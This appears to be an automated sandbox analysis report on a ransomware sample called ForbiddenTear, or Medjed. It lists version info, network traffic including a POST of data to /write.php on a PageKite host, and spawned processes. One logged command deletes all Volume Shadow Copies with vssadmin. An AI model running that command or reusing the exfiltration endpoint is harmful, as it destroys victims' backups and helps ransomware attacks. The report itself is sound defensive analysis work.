                                                                                  RT_ICON0x797f80x468GLS_BINARY_LSB_FIRST
                                                                                  RT_ICON0x79c600x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                                  RT_ICON0x7de880x10828dBase III DBT, version number 0, next free block index 40
                                                                                  RT_GROUP_ICON0x8e6b00x4cdata
                                                                                  RT_VERSION0x8e6fc0x2f8data

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  Translation0x007f 0x04b0
                                                                                  LegalCopyright
                                                                                  InternalNameForbiddenTear
                                                                                  FileVersion1.0.0.0
                                                                                  CompanyName
                                                                                  LegalTrademarksEncrypting all your shit :D
                                                                                  Comments
                                                                                  ProductNameMedjed
                                                                                  ProductVersion1.0.0.0
                                                                                  FileDescriptionMedjed
                                                                                  OriginalFilenameForbiddenTear.exe

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 2, 2020 16:27:22.719651937 CET4970980192.168.2.395.216.167.199
                                                                                  Dec 2, 2020 16:27:22.759891987 CET804970995.216.167.199192.168.2.3
                                                                                  Dec 2, 2020 16:27:22.760039091 CET4970980192.168.2.395.216.167.199
                                                                                  Dec 2, 2020 16:27:22.760946035 CET4970980192.168.2.395.216.167.199
                                                                                  Dec 2, 2020 16:27:22.800873995 CET804970995.216.167.199192.168.2.3
                                                                                  Dec 2, 2020 16:27:22.828042984 CET804970995.216.167.199192.168.2.3
                                                                                  Dec 2, 2020 16:27:22.828517914 CET804970995.216.167.199192.168.2.3
                                                                                  Dec 2, 2020 16:27:22.829118013 CET4970980192.168.2.395.216.167.199
                                                                                  Dec 2, 2020 16:27:22.834099054 CET4970980192.168.2.395.216.167.199
                                                                                  Dec 2, 2020 16:27:22.873915911 CET804970995.216.167.199192.168.2.3

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 2, 2020 16:27:11.377876043 CET6418553192.168.2.38.8.8.8
                                                                                  Dec 2, 2020 16:27:11.404983044 CET53641858.8.8.8192.168.2.3
                                                                                  Dec 2, 2020 16:27:13.216013908 CET6511053192.168.2.38.8.8.8
                                                                                  Dec 2, 2020 16:27:13.243186951 CET53651108.8.8.8192.168.2.3
                                                                                  Dec 2, 2020 16:27:22.479176998 CET5836153192.168.2.38.8.8.8
                                                                                  Dec 2, 2020 16:27:22.641010046 CET53583618.8.8.8192.168.2.3
                                                                                  Dec 2, 2020 16:27:59.587095976 CET6349253192.168.2.38.8.8.8
                                                                                  Dec 2, 2020 16:27:59.614200115 CET53634928.8.8.8192.168.2.3

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Dec 2, 2020 16:27:22.479176998 CET192.168.2.38.8.8.80xcb6aStandard query (0)wzl.pagekite.meA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Dec 2, 2020 16:27:22.641010046 CET8.8.8.8192.168.2.30xcb6aNo error (0)wzl.pagekite.me95.216.167.199A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • wzl.pagekite.me

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.34970995.216.167.19980C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Dec 2, 2020 16:27:22.760946035 CET120OUTPOST /write.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Host: wzl.pagekite.me
                                                                                  Content-Length: 840
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 2, 2020 16:27:22.828042984 CET121INHTTP/1.1 503 Unavailable
                                                                                  X-PageKite-UUID: a8e3974dd302721f212a4931562bb295ed8ab2fb
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Cache-Control: no-store
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 66 72 61 6d 65 73 65 74 20 63 6f 6c 73 3d 22 2a 22 3e 3c 66 72 61 6d 65 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 6b 69 74 65 2e 6e 65 74 2f 6f 66 66 6c 69 6e 65 2f 3f 26 61 6d 70 3b 77 68 65 72 65 3d 46 45 26 61 6d 70 3b 70 72 6f 74 6f 3d 68 74 74 70 26 61 6d 70 3b 64 6f 6d 61 69 6e 3d 77 7a 6c 2e 70 61 67 65 6b 69 74 65 2e 6d 65 26 61 6d 70 3b 72 65 6c 61 79 3d 3a 3a 66 66 66 66 3a 39 35 2e 32 31 36 2e 31 36 37 2e 31 39 39 22 20 2f 3e 3c 6e 6f 66 72 61 6d 65 73 3e 3c 68 31 3e 53 6f 72 72 79 21 20 28 66 65 29 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 48 54 54 50 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 6b 69 74 65 2e 6e 65 74 2f 22 3e 3c 69 3e 50 61 67 65 4b 69 74 65 3c 2f 69 3e 3c 2f 61 3e 20 66 6f 72 20 3c 62 3e 77 7a 6c 2e 70 61 67 65 6b 69 74 65 2e 6d 65 3c 2f 62 3e 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 61 74 20 74 68 65 20 6d 6f 6d 65 6e 74 2e 3c 2f 70 3e 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 3c 21 2d 2d 20 20 2d 2d 3e 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><frameset cols="*"><frame target="_top" src="https://pagekite.net/offline/?&amp;where=FE&amp;proto=http&amp;domain=wzl.pagekite.me&amp;relay=::ffff:95.216.167.199" /><noframes><h1>Sorry! (fe)</h1><p>The HTTP <a href="https://pagekite.net/"><i>PageKite</i></a> for <b>wzl.pagekite.me</b> is unavailable at the moment.</p><p>Please try again later.</p>... --></noframes></frameset></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: ForbiddenTear.exe PID: 5660 Parent PID: 5672

                                                                                  General

                                                                                  Start time:16:27:14
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Users\user\Desktop\ForbiddenTear.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\ForbiddenTear.exe'
                                                                                  Imagebase:0x370000
                                                                                  File size:569344 bytes
                                                                                  MD5 hash:8AD3B3C4396AF8F9661168F4D3FDA7A4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Reputation:low

                                                                                  Analysis Process: cmd.exe PID: 5564 Parent PID: 5660

                                                                                  General

                                                                                  Start time:16:27:22
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'cmd' /C vssadmin Delete Shadows /All /Quiet
                                                                                  Imagebase:0x7ff77d8b0000
                                                                                  File size:273920 bytes
                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: sihost.exe PID: 204 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:22
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: conhost.exe PID: 1036 Parent PID: 5564

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6b2800000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: sihost.exe PID: 4916 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: sihost.exe PID: 5080 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:23
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: sihost.exe PID: 2792 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:24
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: sihost.exe PID: 412 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:25
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: sihost.exe PID: 4920 Parent PID: 1188

                                                                                  General

                                                                                  Start time:16:27:26
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sihost.exe
                                                                                  Imagebase:0x7ff6ff9b0000
                                                                                  File size:79360 bytes
                                                                                  MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: ctfmon.exe PID: 764 Parent PID: 3244

                                                                                  General

                                                                                  Start time:16:27:32
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\ctfmon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:ctfmon.exe
                                                                                  Imagebase:0x7ff79c1b0000
                                                                                  File size:10752 bytes
                                                                                  MD5 hash:D4DAF47FBF707B23B874DE6F139CB0C7
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Analysis Process: cdd.dll PID: 4 Parent PID: -1

                                                                                  General

                                                                                  Start time:16:27:36
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\cdd.dll
                                                                                  Wow64 process (32bit):
                                                                                  Commandline:
                                                                                  Imagebase:
                                                                                  File size:228352 bytes
                                                                                  MD5 hash:9455C42505ABA9DAE97F7D5F507B2570
                                                                                  Has elevated privileges:
                                                                                  Has administrator privileges:
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  Analysis Process: LogonUI.exe PID: 4912 Parent PID: 4180

                                                                                  General

                                                                                  Start time:16:27:36
                                                                                  Start date:02/12/2020
                                                                                  Path:C:\Windows\System32\LogonUI.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d
                                                                                  Imagebase:0x7ff6e7730000
                                                                                  File size:13312 bytes
                                                                                  MD5 hash:3AAD3281A2953F4DDA09D7EE5BEE8BA6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >